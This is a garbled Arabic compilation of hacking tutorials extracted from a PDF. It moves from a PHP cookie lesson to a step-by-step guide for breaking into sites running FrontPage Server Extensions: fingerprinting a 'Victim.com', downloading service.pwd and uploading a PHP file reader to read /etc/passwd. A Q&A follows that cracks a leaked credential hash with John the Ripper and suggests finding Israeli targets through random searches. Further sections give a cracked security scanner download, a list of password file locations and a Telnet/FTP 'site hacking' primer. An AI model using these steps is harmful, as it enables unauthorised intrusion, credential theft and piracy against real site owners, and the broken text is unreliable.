الكبرى ملفات الكوكیز التيتصدرها على جمیعمزوداتها،‏ لتنسیق المعلومات المتضمنة ، ولكي لاتصدر 

كل منمزوداتها ملفاتكوكیزللمستخدم ذاته ، عند زیارتهلصفحات مختلفةفيالموقع.‏ 

. وتعود 

- مكونات مل فالكوكیز : 

^^^^^^^^^^^^^^ 

یتكون عادة من عدةاجزاء هياسم المل ف ‏،قیمته،تاریخانتهاء مفعوله ، الموقعالمالكله ... 

زراعةالكعكات على جهاز العمیل : - 

أولا ‏:كی فتزر ع ملفات الكعكات 

یتم ذلكباستخدام الدالة setcookie وتعریفهابالشكلالتالي : 

: 

code: 

boolean setcookie ( string name [, string value [, int expire 

[, string path [, string domain [, int secure]]]]]) 

تهمناالمدخلا ت الثلا ثالاولى و هي : 

: nameاياسم الكعكة ‏...فبامكانكارسال اكثر من كعكةالى متصفح واحد و عندها یصبحالاسم هو 

الطریقةالوحیدةللتمییز . 

: valueالقیمة 

‏...فقطقیم نصیة ‏...لا یمكنك وضع مصفوفةكقیمة و هذاأامر مهم ‏...لكنانتبهبامكانك 

وضع مصفوفةلكنبط ریقةاخرى ‏...؟كی ف ؟ ‏:استخدمالدالة serialize لتحویلاي متغیرفيبي ات ش 

بيالى شكل نصي و منثماستخدم unserializeلاعادتهالىالشكلالطبیعي.‏ 

) ١ ینایر 

. 

--> 

: expireاي عددالثواني منبدیة عصرالیونكس ( ١٩٧٠ والتي بعدها سیقومالمتصفح 

على جهاز المستخدمبحذ ف الكعكة ... و هناثلا ث حالا ت:‏ 

أولاً‏ ‏:أن یكون الوقت المعطىكمدخل اكثر من الوقت الحالي على جهاز العمیل و عندهاتخزن الكعكة 

على جهازالعمیل وتحذ ف عندانقضاءالمدة 

١٢٢


--> 

ثانیاً‏ ‏:أن یكونالوقتالمعطىكمدخلاقل منالوقت على جهازالعمیل و عندها لا یقوم المتصفح على 

جهازالعمیل بتخزینها واذا وجدت كعكةبنفسالاسمفانه یحذفها حتىلولمتنتهي المدة 

ثالثاً‏ ‏:إ ذالمتحدد وقتافانالكعكةتخزنفي ذاكرة المتصفح وتفقد حالما یغلق المستخدم الموقع . 

. 

--> 

: مثال 

code: 

 

منالدوالالمفیدة دالة time والتيترجعالوقتالحالي على شكل عدد الثواني منبدایة عصرالیونكس 

١) ینایر .(١٩٧٠ 

ثانیاكیفتحذ فاوتعدل كعكة:‏ 

لكيتحذ ف كعكة علیكأنترسل كعكةبنفس الاسم و خالیةالقیمة و ذات وقتاقل منالوقت على جهاز 

المستخدم 

مثال:‏ 

code: 

 

ملاحظات : 

١- عندماتحددزمنا ماضیاًاجعلهقیمةكبیرةلكي تتفاد ىفارقالتوقی تبینالخادم والعمیل 

‎٢‎‏-لكيتعدلأي كعكة علیك حذفها وإرسالها من جدید . 

. 

ملاحظة مهمة : 

یجبانتستدعيالدالة setcookieقبلأنترسلاي شيءالىالمتصفح ‏..فمثلا الكودالتاليلنینجح 

: 

code: 

١٢٣




 

 

 

 

 

بللوكان هنالك مجرد سطرفار غقبل علامة البدایة ؟ ‏ 

 

 

١٢٤




قراءةالكعكا ت من جهاز العمیل : 

‏-كی فتستقبلالمتغیرا ت من الكعكة 

.. 

-: 

^^^^^^^^^^^^^^^^^^^^^ 

مثال 

قلنابانهبامكانك ارسال اكثر من كعكةالى متصفح واحد 

عندما یطلبالمستخدم من متصفحهِ‏ صفحة على موقعكفانالمتصفح یقومبارسال جمیعالكعكاتالتيقمت 

ان ت بزراعتها عند المستخدم PHP ‏...تسهل علیكقراءة هذه الكعكات وتخزنهافي مصفوفةاسمها 

‏$_‏COOKIEو هي مصفوفة منالنو ع Associativeب Arrays حیثان المفتاح هواسمالكعكة و 

القیمةقیمة الكعكةكماارسلتها . 

: 

code: 

 

: و هذهتطبع 

code: 

palhackerz.com 

تطبیق ‏:تخصی صلون الخلفیة 

كمثالبسیط دعنا نقومبانشاء موقع مبسط و نستخدم الكعكاتلكي نحفظلونالخلفیةالمحببةالىالشخ ص 

.. 

‏-ماذالدینا ؟ 

‎١‎‏-المل ف : user.php یقوم المل ف بعملیتین 

‏




 

 

 

 

 

 




value=" INPUT‏>لا type="submit" تتذكرلوني المفضل"‏ > 

 




function clear_color(){ 

setcookie('color',$_GET['color'],time()-36000); 

header('Location:index.php'); 

} 

// selection 

if ($do=='display_form'){ 

display_form(); 

}elseif ($do=="set_color"){ 

set_color(); 

}elseif ($do=="clear_color"){ 

clear_color(); 

} 

?> 

‏-الدالةالاولى display_formتقومفق ط بعر ض نموذجاختیاراللون . 

‏-الدالةالثانیة set_colorتقومبحفظاللون المختارفيكعكة وترجعالمستخدمالىالصفحةالرئیسیة . 

‏-الدالة الثالثة get_colorترجعقیمة اللون منالكعكة واذالم یكنهنالكقی مةفانهاترجعلون 

افتراضي وهوالابی ض . 

‏-الدالة الرابعة clear_colorتقومبمسحالكعكةبالطریقة التي ذكرناهافيالدرس . 

- ٢ مل ف ال : index.php 

مل ف عادي جداًالاانهیطلب الدالة get_color من مل ف user.phpكما یلي : 

١٢٨




code: 

 




" 

معلومات مهمة عن المواقع التي تدعم الفرونت بیج 

" 

$$$$$$$$$$$$$$$$$$$ 

T.O.L. ( DeXXa ) 

$$$$$$$$$$$$$$$$$$$ 


ماالذي یجبأنتعرفهقبلقراءة هذاالدرس 

‏*الالمامبالانجلیزیة 

‏*قراءة المزید عن ال 

: 

. 

FrontPage Server Extensions ولی سكیفیةاختراقه . 

‏*كیفیة التعامل معبرنامج . Microsoft Office FrontPage 

‏*كیفیة التعامل مع ال . CHMOD 

‏*كیفیة التعامل مع ال 

‏*كیفیة التعامل معبروتوكول . HTTP 

‏*كیفیة التعامل معقواعدالبیانات العلائقیة . SQL 

‏*كیفیة التعامل معأحدلغات الویب و التيتعملبناحیة الخادم 

Server Side Scripting 

. Telnet 

. Language 

واذكرأ خیراً‏ بأنياؤمن بأنالمخترق ماهوإلاانسان وظ یفتهالبرمجة وادارة وت حلیلالنظم والشبكا ت و 

لیسانسان همه هومعرفةالقلیل 

منالأمورالتيتساعدهفيالتخریب و العبثبماتعببهالآخرون وتضییعالوقتفي الدردشة و التسكع 

بمقاهيالانترن ت ، ولذافافتر ض بأن ما أقوله سیكون واضحاً‏ و لا یحتاجل . Screen Capture 

خریطة الموضو ع 

: 

@ 

 

. ماالذي ستسفیده عندقراءةالموضو ع ؟ 

FrontPage Server Extensions ؟ 

FrontPage Extension Server ؟ 

FrontPage Extension Server 

. مقدمة 

. ما هو ال 

. ما هي آلیة عمل ال 

‏.كیفیةالاتصالب 

‏.كیفیةمعرفة هلالموقع یدعم ال FrontPageأم لا 

‏.كیفیةاستغلالهلیصبحفي صلاحك 

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 

@ ماالذي ستستفیده عندقراءتكللموضو ع ؟ 

* ستعر ف ما هوال 

آلیة عمله 

‏*كیفیة جمع المعلومات الخاصة بأي موقع 

* بع ضالطرقللاستفادة منه عندالاتصالبالخادم الخا صبه 

. FrontPage Server Extensions 

. 

. 

. 

* 

١٣٠




: مقدمة 

@ 

تسعى شركاتالتسكین بأنواعهاتوفیر شتى شبلالراحة لعملائها،‏ فتجدهم یقدمونالعرو ض والتخفیضات 

لارضاءالعملاء مثل دعمل PHP و 

. SQL و FTP و SSL و Perl و CGI 

وبالنسبةلمدارءالمواقع Webmastersفإ نالبرنامجالمفضللهم لتصمیم مواقعهم هو 

Office FrontPage والذيكما هو مبین یأتي 

معحزمة Office ‏،اذیتمیزبسهولةا ستعمالهكماانه یوفر بع ض البرمجیات مثل عداد الزوار ، ولذا 

تقدم شركاتالتسكین دعمكاملللبرنامج 

@ ما هوال 

Microsoft 

. 

FrontPage Server Extensions ؟ 

ملاحظة 

سأتكلم حالیاً‏ عنالحزم التيأتت بعدحزمةالاصدار الثاني 

( 

: 

) 

. 

هو عبارة عنحزمة من البرامجیتمتثبیتهافي الخادم Serverالخا صبشركةالتسكین التيلهاقالبیة 

لدعم بع ضالخصائ ص 

و عندالتثبی ت یجبانشاء عدة مجلدا ت منها 

: 

private_/ 

vti_bin_/ 

vti_cnf_/ 

vti_log_/ 

vti_pvt_/ 

vti_txt_/ 

و سأتكلم عن وظ یفةكل مجلد یهمنا 

‏*المجلد 

: 

: vti_bin_ 

ویتواجدبداخله مجلدان هما 

: 

ملاحظة ‏:النقطتانتشیرانإلىالمجلد 

( vti_bin_ 

) 

/vti_adm_/.. 

/vti_aut_/.. 

الثاني لا یهمنا بقدر ما یهمالمجلدالأولاذأنه الخا 

علىكلمةالمرور الخاصةبه 

كما یوجد ملفانهما 

صبالمشر ف ولاتستطیعالاستفادة منهاذالمت حصل 

. 

: 

١٣١




shtml.exe/.. 

fpcount.exe/.. 


: vti_pvt_ 

ویتواجدبداخله عدة ملفات ما یهمنا منهاهو الملفاتالتالیة 

: 

‏-المل ف : service.pwd وفیهیتواجدالمعر ف وكلمة المرورالخاصةبالمشر ف مشفرةبمقیاس 

. authors 

. DES 

‏-المل ف : service.grp وفیهیتواجد المعرفین من مشرفین و 

: doctodep.btr وفیهیتواجد مسارات الملفاتالتيتمتحمیلها على 

الخادم ‏،فاذاقمت بتنزیله فتستطیعمعرفة الملفات 

الموجودةبالموقع . 

- ملفي deptodoc.btr و 

وفي الغالب لاتستطیعمعاینة محتویات المجلداذ یوجدفيالمجلدالرئیسيللموقع مل ف 

یقومبمنعالجمیع ‏(المالك والمجموعة و 

الزوار منمعاینة المجلد و محتویاته 

htaccess. 

. 

( 

ملاحظة ‏:ان عدم وضعأي صلاحیة على المجلدلایعني بأنهاتعتبرثغرة ولكنضع ف منالناحیة 

( 

) 


: private_ 

ویتواجدبداخله مل ف واحدفقطهو.‏htaccess . 

ما هي آلیة عم لال 

FrontPage Extension Server ؟ 

@ 

یعتمدالاتصالبینالعمیل وال 

. HTTP علىبروتوكولال FrontPage Extension Server 

فلواردنامعاینة عدادالزوار عن طریقبرنامجال FrontPageفانهیتمارسال طلب Request 

للخادمثم یمررهالخادمبال 

و الذي یمررهبالتالي ببرمجیاتالخادم مثل ، fpcount.exe و منثم یكررتمریره مرةأخر ىإلىال 

Extension Server وإلىالخادم و یظهر المخرجات 

لالعمیل ، علماًان هذهالاتصالات تتم عبر جدار نار . 

‏@كیفیةالاتصالب 

FrontPage Extension Server 

: FrontPage Extension Server 

. 

كما ذكرنا سابقاًانأغلب شركاتالتسكینتسعىلراحة العملاء،‏ فتجدهاتدعم خدمة ال FrontPage و 

ذلك لتحمیلالصفحا تللموقع علماً‏ بأنها 

تدعمبروتوكولال FTP وتحمیلالملفات وانشاءالمجلدات عبرالمتصفحاعتماداً‏ علىالبرمجیاتالتي 

تعملبناحیةالخادم 

والآنقم بتنفیذالتاليلمعرفةكیفیةالاتصالبال 

: FrontPage Extension Server 

١٣٢




ملاحظة ) 

الشكلیة 

: 

( 

سأتكلم حالیاً‏ عنحزمة ال XP والتي لاتختل فأبداً‏ عنالحزمالباقیةإلافي بع ض النقاط 

. Office 

* 

‏*قم بتشغیلبرنامجال FrontPage و الذي یأتي مرفقاً‏ معحزمة 

منقائ مة 

‏*قمباضافة المعر ف وكلمةالمرور ‏(الأصلیة ولیستالمشفرة 

‏*اذاكانت ص حیحة سیظهرلك الخادم ملفاتالموقعكلها و عندهاتستطیعالتحمیل والتعدیلفيالملفات و 

المجلداتومعاینة الشفرةالمصدریة 

للملفات 

‏*اذالم تتمالعملیةبنجاحفهذایعني بأنالموقع لا یدعم الخدمةأوأنالمعر فأوكلمةالمرور خاطئة و 

یطلب منكمعاینتهافي وضعیةالقراءة و لا 

یظهرلك الشفرةالمصدریةالأصلیة ولاالمجلدات و الملفات التي یحویها الموقع . 

. ( 

. Open Web Fileقمباختیار 

. 

‏@كیفیةمعرفة هلالموقع یدعم ال FrontPageأم لا 

: 

یوجد العدید منالطرقلمعرفةقابلیة الموقعلدعمالفرون تبیج نذكر منها 

: 

* 

معاینة مل ف نجاحالتثبیت 

: 

( 

) 

ملاحظة ‏:قد لاتجد مل ف vti_inf.html_ ولكن هذالایعنيأنالموقع لا یدعم الخدمة ‏،كماأنه لا 

یعتبرثغرة 

‏-قم بزیارةأي موقعتریدأنتعر ف هلالخادم الخا صبه یدعمال FrontPageأم لا . 

‏-قمبمعانیة مل ف ‏_‏vti_inf.htmlبواسطةالمتصفح و ذلكبارفاقه بعنوان الموقع ، مثال 

: 

http://www.Victim.com/_vti_inf.html 

- و عندمعاینةالصفحة ستجد جملة FrontPage Configuration Information ‏،فهذامعناه 

أنحزمة ال 

في الخادمبنجاح 

FrontPageقدتمتثبیتها Extension Server 

. 

ولمعرفةاصدارةالخدمةقمبالتالي 

. Source Code 

: 

‏-قمبالنقر بزرالفأرة الأیمن علىالصفحة ‏،ثمقمباختیار 

‏-قمبالب حث عن "FPVersion="Version حیث Versionتشیرللاصدار الخا صبالخدمة 

* عن طری ق مجلد 

. 

: vti_cnf_ 

‏-قم بزیارةأي موقعتریدأنتعر ف هلالخادم الخا صبه یدعمال FrontPageأم لا 

‏-قمبمعانیةالمجلدبواسطةالمتصفح و ذلكبارفاقه بعنوانالموقع ، مثال 

. 

: 

http://www.Victim.com/_vti_cnf 

١٣٣





‏-قمبالب حث عن الشفرةالتالیة 

. Source Code 

: 

vti_generator:Programe 

- حیث Programe یشیرلنو ع البرنامج واصدارته و سیكونفي حالتنا هو Microsoft 

. X والاصدارة الخاصةبههي FrontPage X 

‏*الكش ف عنالشفرةالمصدریةللصفحة 

: 

‏-قم بزیارةأي موقعتریدأنتعر ف هلالخادم الخا صبه یدعمال FrontPageأم لا 


‏-قمبالب حثبینترمیزيالرأس عنالشفرةالتالیة 

. 

. Source Code 

: 

 

- حیث Programe یرم 

زلنو عالبرنامج واذاكان البرنامجهو 

یتبینلنا بأن الخادمالخا صبالموقع یدعم الفرون تبیج و 

Microsoft FrontPage X.0 

الاصدارةالخاصةبه هي . X 

* عن طریق موقع 

: NetCraft 

. NetCraft.net 

. 

‏-قم بزیارة الموقع 

‏-قم بكتابة عنوان الموقع مستثنیاًال //:http . 

‏-انتظربضعثواني 

- ستجدأن الموقعأعطاك بع ض المعلومات عنالملقم والخدمات الموجودةفي الموقع الذيتریدمعرفة 

قابلیة دعمهللبرنامج ، و منتلكالخدمات 

خدمة ال FrontPage و ستظهرلكبالشكل mod_frontpage/X حیث X یرمز لاصدارةال 

. FrontPage Extensions Server 

* عن طریق ال 

: Telnet 

( 

) 

ملاحظة ‏:تساعد هذه الطریقةفيمعرفة بع ضالمعلومات عن الخادم و المخرجاتهي نفس مخرجات 

الطریقة السابقة 

- منقائمة 

Startقمباختیار Run و اكتببالنافذة التي ستظهر 

‏-قمبالاتصالبالموقع عبرالمنفذ ‎٨٠‎بالشكلالتالي 

. Telnet 

: 

Microsoft Telnet> Open www.Victim.com 80 

‏-قمبارسال طلب Requestللخادم و لتكن الطریقة Method هي . Head 

١٣٤




) ملاحظة : علیكالالمام بكیفیة التعامل معبروتوكول ( HTTP 

. 

: 

Head www.Victim.net HTTP/1.1 

Host: ISP.net 

*/* :Accept 

Connection: close 

. 

‏-قمبارسالالتالي حیث http://www.Victim.net هو الموقعالض حیة و ISP.netهو البروكسي 

الخا صبمزودالخدمةالخا صبك 

‏-انتظربضعثواني 

- ستستلمالاجابة Response عن الطلب الذيارسلتهبللخادم Server مثلتاریخ آخرتعدیل 

للصفحة و نو عالملقم والخدمات المتوفرةبه 

و من ضمن الخدمات ستجد نفس الذي وجدناهفي الطریقة السابقة و هوأن خدمة ال 

FrontPage و 

ستظهرلكبالشكل mod_frontpage/X 

حیث X یرمز لاصدارة ال . FrontPage Extensions Server 

‏@كیفیةاستغلالهلیصبحفي صال حك 

: 

. 

( 

) 

اذا عثرت على موقع یدعم هذهالخدمة ولم یتم وضع صلاحیات على مجلدال ‏_‏vti_pvtقمبالتالي : 

ملاحظة : علیكالالمامبلغةتعمل على ناحیة الخادم وفي حالتنافهيال PHP ‏،كماأن على الموقع 

الض حیة دعم هذه اللغة 

‏*قمبالاتصالبالموقعالض حیة 

‏*قم بتحمیل مل ف ینتهيامتدادهب PHP و ضمنه التالي 

‏‏ 

وقمناهنابرفع مل ف PHPللخادم یقوم بفتح ملف غیرمعینثم یحضر محتویاته على حسب حجمه 

بالبایتثمیعرضهثم یغلقالملف ، والآنكل 

١٣٥




ما علیكفعلهالآن هوالدخول على الموقع عبرالمتصفح والحاقه ب بعنوان المل فالذي حملته والمتغیر 

file و المل فالذيتریدمعاینةالشفرة 

المصدریةالخاصةبه ، مثال : 

www.Victim.com/uploded_file...../../etc/passwd//:http 

حیث uploded_file یشیر لاسمالمل فالذيقمت بتحمیله 

الملفات والمجلداتالموجودةفيالخادم .... 

، وتستطیعاضافةاوامرتسمحلكبمعاینة 

١٣٦

س




، 

(: 

!! 

س‎٥‎‏:أها ‏،لكني ماأعر فأستخدم هذاالبرنامج ممكنتشرحهوليأخيالعزیزالقنا صلو سمحت ؟؟ 

ج‎٥‎‏:‏ لاتستأذن مني یاولد ‏،أنافي الخدمة ، شو ف:انتأول ماتنزل البرنامجوتفك ضغطه ‏،هیكون 

فیه مجلدین , run doc & ‏:الي یهمنا هو مجلد , run شو ف:‏ عشانتسهل على نفسك وبدل ماتفتح 

الدوسوتدخل على مجلدالبرنامج وهالمشاكل وكما نالبع ض مابیعر فیعملهالأشیاء:‏ p: 

ابحثفي جهازك عن command.com ‏:وقمبنسخه والصقهفي مجلد , runأوكى ؟؟ 

وجیبكلمةالسر هذه tradesys:FpNTpIDWSk872 ‏:وحطهافي مل ف txtباسم passwd مثلا 

وضعهفي مجلد , run ولاتقم بفتح , john.exe افتح command.com واكتبفیهالأوامرالتالیة:‏ 

لیب حثلك عنالكلمات السریةالتيتكون مطابقه لاسم المستخدم 

لیب حثلك عن الأرقامفقط 

لیب حثلك عن الحرو ف الصغیرة 

لیب حثلك عن جمیعالاحتمالات ) وأنا على طولأستخدم هذاالأمر 

عشانكده بتطول عملیة الفكمعي(‏ D: 

وبعدما ینتهيالبرنامج منفك الكلمة ستجدكلمةالسر المشفرة والمفكوكهبالمل ف هذا john.pot: 

، 

، 

john -single passwd.txt >> 

john -i:Digits passwd.txt >> 

john -i:Alpha passwd.txt >> 

john -i:all passwd.txt >> 

س‎٦‎‏:‏ یااا ه ‏،البرنامج طولكثیر ، متأكدأنههیفكتشفیرها ؟؟ 

ج‎٦‎‏:أیوووووه لازم یفكتشفیرهافيالنهایة ، حتىلوأخذأسبو ع؛)‏ ‏،لأنهبیجرب جمیعالاحتمالا ت.‏ 

وممكنتعر ف حالة البرنامجبالضغط علىأي زر منلوحة المفاتیح 

(: 

، 

س‎٧‎‏:الحمد الله خلا صانفك تكلمةالسر , ‏(‏Y‏)لكن ویناسم المستخدم ؟؟ 

ج‎٧‎‏:فيكلمةالسر هذه , tradesys:FpNTpIDWSk872 ‏:هیكوناسم المس 

یعنيالكلمةالي بتكونقبل علامة 

تخدم ( tradesys : 

( : 

$: 

، 

س‎٨‎‏:قناا ا ص ممكنتقوليكی ف جبت هالثغرة منالموقع ؟؟ 

ج‎٨‎‏:هههههههههه ،،، ولیههالوجه الخجلان؛)‏ ‏،أنابصراحة جبتهابالبح ثالعشوائي 

عنك موقع ممكنتعمل علیه سكان ببرنامجفح ص مثلبرنامج عمران 

الثغرات الموجودةبالموقع 

، ولكنانتلوكان 

‏(المفضللدي ) D: عشانتطلع 

(: 

(: 

س‎٩‎‏:‏ طیبأنا عندي سؤالین عالجواب اليفات ده ، هأسأل واحدالأول ‏،ایه طریقة البح ثالعشوائي 

هذه ؟؟ 

ج:أحمأحم : انكتب حث عنثغرةمعینةفي محركب حث یستخدمال spiders عشانتلاقي 

مواقعكثیییرةفیهاالثغرة هذه ‏،في طبعا مواقعكثیرة بتستخدمالسبایدرز ‏،لكنلن أقولكلك علىأي 

واحدة منها ‏،الا هذا الموقع walla.co.il ‏:وطبعا هذا موقعاسرائیلي ، عشانمعظم النتائجتكون مواقع 

، هذهالطریقة 

اسرائیلیة؛)‏ . 

١٣٨


!! 

، 

س‎١٠‎‏:‏ ممممم ‏،كی فیعنيتب حث عنثغرة معینه ؟؟ ، مافهمتك زین 

ج‎١٠‎‏:أنا واالله ماأستخدم هالمواقعالاللب حث عنثغرات الفرون تبیج :$ ، یعنيانت مثلا عایزتب حث عن 

الثغرة التيتم ذكرها سابقا ایه ؟؟ مانتكاتب غیركلمة واحدة 

، هذه :) :) service.pwd : 

، هتكتب 

:) 

(: 

، 

س‎١١‎‏:أهاااا مشكور حبیبي ‏،كنت عایزأسألككمان عنكیفیة عملبرامجالسكان على الثغرات 

ج‎١١‎‏:البرامج هذه بتكونفیها مجموعةكبیرة منالثغراتأو ال , EXPLOITES وبتبدأتجربثغرة 

، وفي موقع رهیییب عشانتجیب منه ال , EXPLOITES هذا 

ثغرة على الموقع 

هو:‏ 

، وتطلعلكالنتائج (: 

... http://www.ussrback.com/ 

" شرح برنامج Shadow Scan Security لتحلیل الموقع " 

١٣٩




$$$$$$$$$$$$$$$ 

 

$$$$$$$$$$$$$$$ 

الكاتب:‏ لا 

د‏ ر 

نبذةبسیطة عن البرنامج : 

هذا البرنامجهو أكثر البرامجفعالیة في اكتشا ف الثغرات وأیضا المنافذ المفتوحة ف المواقع ولدیهأعمال 

كثیرةلكنيلن أتطرق إلالعملیة واحدةفق ط وهيشر حكیفیة اكتشا ف الثغراتفي المواقعومعرفة النطاقات 

المستخدمةلهذا الموقع وبالنسبةللخیارات الباقیةلنأشرحهالأنها سو فتأخذ وقت طویللكني سو ف 

أقسم شرحيلهذا البرنامج لأقسام عدة وسو فأبدئهابالأعظم وهوشرحلكیفیةإخراجثغرات الموقع 

والمنافذ الخاصةبه والمواقع المسجلبها والمزید من الوظائ ف 

أولا:تنزیل البرنامج وتنصیب الكراكSecurity Shadow Scan 

منه مافیهأبسط 

حمل البرنامج 

من هذي الوصلة 

http://www.safety-lab.com/SSS.exe 

وبعد 

مایكتمل التحمیل 

حمل الكراك 

منهنا 

http://www.e3sar.net/almodammer/ShadowSecurityScanner5.35.exe 

الطریقة : 

======================================== 

بعدتحمیل البرنامج وتنزیله وعمل SetUpله 

افتح الكراك 

وبعد ذلك ستظهر هذه الصورة : 

١٤٠


+++++++++++ 

ٍ][١ ‏][اضغطلیتمتنفیذ الكراك 

][٢ ][ بعدإتمام عملیة الكراكاضغطهناللخروج 

======================================== 

&***** ش البرنامج ر ح*****&‏ 

)= 

سو فأشرحباختصار ومنیصعب علیه الفهمأرجوأنیتقدمليبالسؤال 

بعدتحمیل البرنامجقم بفتحه منقائمة 

ابدأStart 

واب حث عنه ضمن البرامج 

بعدإیجاد البرنامجقم بفتح 

ShadowScanSecurity 

لیأتيلك هذا ( = 

الشكل - ١ - 

أثناء الضغ ط علىScanner 

الشكل ٢- - 

١٤١




= ٣ 

‎١‎‏=إ ضافة سیاسة جدیدة والمقصودبهاأیقونةأخر ى وهي الرقم ٤ ولكنتحملاسمك ‏(ولاداعيلأنتنشأ 

باحثأو سیاسة جدیدةلك یكفیك الموجودة ( 

٢ ‏=إعداداتلهذا الباح ث وأیضا انا لاأنص حك بتغییر شيءأبدافي هذا الخیار 

حذ ف الموجه الجدید التي انت صممته والمقصود الأیقونة التيتشبهرقم ٤ ولكن منتصمیمك 

فبضغطكهنا سو فتحذفها 

٤= علیكتظلیله وهو المربع الذي یوجدبه خصائ ص الب حث عنكل شيء 

‎٥‎‏=لرجو عللخلف ولاأظنأنهناك رجو علأنها العملیة والإ طار الاول 

اضغطهاإ ذاأردت المتابعة 

الإ طار 

=٦ 

٧ ‏=إزالة 

الشكل - ٣ - 

) (١ للرجو عإلى الشكل ٢- - 

(٢) الذهابإلى العملیة التالیة 

) ٣ ‏)إلغاءإكمال العملیة 

الشكل - ٤ - 

١٤٢




+١ ‏+إ ضافة موقعللبحثفیه 

+٢ ‏+إ ضافةأيبي من وإلى 

من ملف سواءكانیحتوي على مواقعترید البحث عنها اوآيبیات 

موقع وبعدتحدیده أثناء الضغ طهنا سو فینحذ ف 

+٥ + العودة والرجو عإلى الخل فأي ‏:الشكل -٣ - 

+٦ ‏+إتمام العملیة 

+٧ ‏+إزالة والخروج من الإ طارإلى واجه البرنامج الرئیسیةكباقي الأزرار السابقةفي الأشكال السابقة 

+٣ ‏+تحمیل 

+٤ + عندإ ضافة 

الشكل ٥- - 

أثناء ضغ ط الزر Done وفي الخطوة السابقة سو فیظهر هذا المربع الكبیر 

ومنهنا سو ف نبدأ البح ث عن الثغرا تأنظر الشكل لتفصیل أكثر 

١٤٣




الشكل ٦- - 

بعد الضغ ط على Start Scan وذلك بتظلیل الموقع والضغظ بزر الفأرة الیمین 

انتظرقلیلا بعد ضغطكلرقم‎١‎في الشكل -٥ - 

وسو ف یقوم البرنامجبالبح ثفي الموقع والمنافذ الخاصةبه 

مع النطاقاتكماهو 

موضحفي هذا الشكل 

... 

١٤٤




" 

اماكن وجود ملف الباسورد في أنظمة التشغیل 

" 

$$$$$$$$$$$ 


$$$$$$$$$$$ 

في نطملیونكس 

/etc/shadow 

في نظم صن میكروسیستیمز 

/etc/shadow 

في نظمال BSDبصفه عامه 

/etc/master.passwd 

في نظمالسیلیكون جرافیكس SGI المسمى ARIX 

/etc/shadow 

نظامايبيام المسمى AIX 

/etc/security/shadow 

)) 

(( (( (( 

/etc/shadow 

(( 

)) 

نظم ویندوزبصفه عامه )) XP - NT - 2000 (( 

(( 

/winnt/system32/config/sam 

نظم یونك سبصفه عامه 

وبع ض منتجاتالالفا 

ات شبي یو اكس - ‏((ترو یونك س 64 

اغلب هذهالاصداراتتعتمدتشفیر MD5 القوي 

المل ف المفعل بتشفیر (( LanMan 

)) 

خا صبالمنفریم ونظمالریسك 

٦٤ 

‏((هذاالمل ف مغلق عادةالا عندالاقلا ع من النظام ولا یسمح بفتحهاو نسخه طالماالنظامیعمل حتى ولو 

كانلدیك صلاحیات الادمنیستریتور 

المل فالاحتیاطي 

)) 

(( 

(( 

)) 

/winnt/repair/sam or sam._ 

في الویندوز اكسبيالبروفیشینال واصدارات الویسلر 

لنتجدالویندوزفي مجلد WINNT 

ولكن سیكونكالویندوزالعاديWindows . 

سیرفر ‏-ادفانسد سیرفر 

(( 

١٤٥


اختراق الموقع ‏(الجزء الأول)‏ " 


" 

$$$$$$$$$$ 

الكاتب:الكندور 

$$$$$$$$$$ 

مقدمه : 

سأعیدتعری ف Telnet من جدید ولكنبطریقهاكثربساطه 

Telnetهوبرنامج یستخدمفيإنشاء وصلهبین جهازین ‏،والجهازالمتصل یستخدم عنوان الجهاز 

المستهدف و رقم المنفذ Port الذي سیتمالاتصال علیه ‏،والجهازالمستهد ف الخادم ‏)یشغلبرنامج آخر 

‏(‏Daemon‏)یستمع على هذا المنفذ و تتم عملیهالإرسال والاستقبالباستخدامأحدالبروتوكولات 

تشبیه من حیاتناالعملیة نفتر ضأن هناك رجلفيفرنسا المستهد ف)‏ وأنت المتصل)تریدإقامة حوار 

معه ‏(وصله)‏ وأنتفي مصر ‏..فلابدلك مناستخدام وسیله اتصال (Telnet) ولنفر ضأنها الهات ف 

الذي لابدللرجلأن یضعه علىأذنه ‏(‏Daemon‏)لكي یسمعك .. ولنفر ضأیضاأن هذا الرجل لایتحد ث 

العربیة ‏..إذنفلابدلك مناستخدامالفرنسیة البروتوكول المستخدم)‏ حتى تتحد ث(‏ الإرسال والاستقبال)‏ 

بحریه 

مما سبق نستنتجأن Telnetهو مجرد وصله ) مثلالهات ف ( .. وانه لابدلنا منمعرفة البروتوكول 

المستخدمفيالاتصال حتى ننجحفيالإرسال و الاستقبال ‏.كماانه لابدلنا منأننعر فأیضاأنه لابد من 

برنامج Daemonیتسمع على المنفذالمرادالاتصال علیه . 

. 

) 

) 

.. 

) 

) 

: 

استخدام Telnet ك FTP Client 

. 

المنفذالذي سیتمالاتصال علیهفي حالهاستخدامنابروتوكول نقلالملفات FileTransfer Protocol 

في الغالب سیكون .. ٢١ 

أینالصعوبةإذن ؟ 

الصعوبةتكمنفيأننالكي نستخدم Telnetك FTPیجب Client علیناالإلمام بقدركبیر ببروتوكول 

.. 

. 

FTP !! 

ولكن هذالن یمنعني من عر ض بع ض الأمثلة لإظهاركیفیة التعامل مع هذا البروتوكول 

بدءالاتصال 

‎١‎‏-قم بتشغیل Telnet و شبك على ftp.zdnet.comبالمنفذ ٢١ 

و هذا ما سیظهرلك 

- Code Sourcesشفرة 

220 l19-sj-zdnet.zdnet.com NcFTPd Server (licensed copy) ready. 

و السطر السابق یسمي Banner الخا صبال FTP Daemon المستخدمفي موقع zdnet وهي 

تختل فباختلا فالموقعالذي سیتمالتشبیك علیه . و الرقم الموجودفيالبدایة یدل على نجاح الاتصال و 

هو رقمثابت 

‎٢‎‏-الخطوةالتالیةهيالولوجباستخداماسمالمستخدم Username وكلمة السر .. Passwordبما 

أن zdnetتدعم المستخدم Anonymous سیتم استخدامهفيالولوجللنظامكالتالي:‏ 

ستكتب 


user anonymous 

و سیستجیبالخادمبالتالي 


١٤٦




331 Guest login ok, send your complete e-mail address as password. 

ثمتكتبأنتالتالي 


pass @zorro 

وبالطبع عندالولوجبالمستخدم Anonymousتقومبإعطاء عنوانالبریدالإلكترونيالخا صبكككلمة 

السر .. وإ ذالمتردإعطاءبریدكفیمكنكأنتكتبأي شئ یأخذ شكلالبرید أي یحتوي على الرمز @ ( 

و سیستجیبالخادمبالتالي 

) 


230-You are user #552 of 2000 simultaneous users allowed. 

230- 

230 Logged in anonymously. 

.. 

. 

. 

. 

وبالطبعتلك ا لإ ستجابهقدتختل ف من موقع لآخر ‏..إلافي الرقمفيبدایةكل سطر 

أنتالآنقدقمتبالولوجإلىالخادمبنجاح 

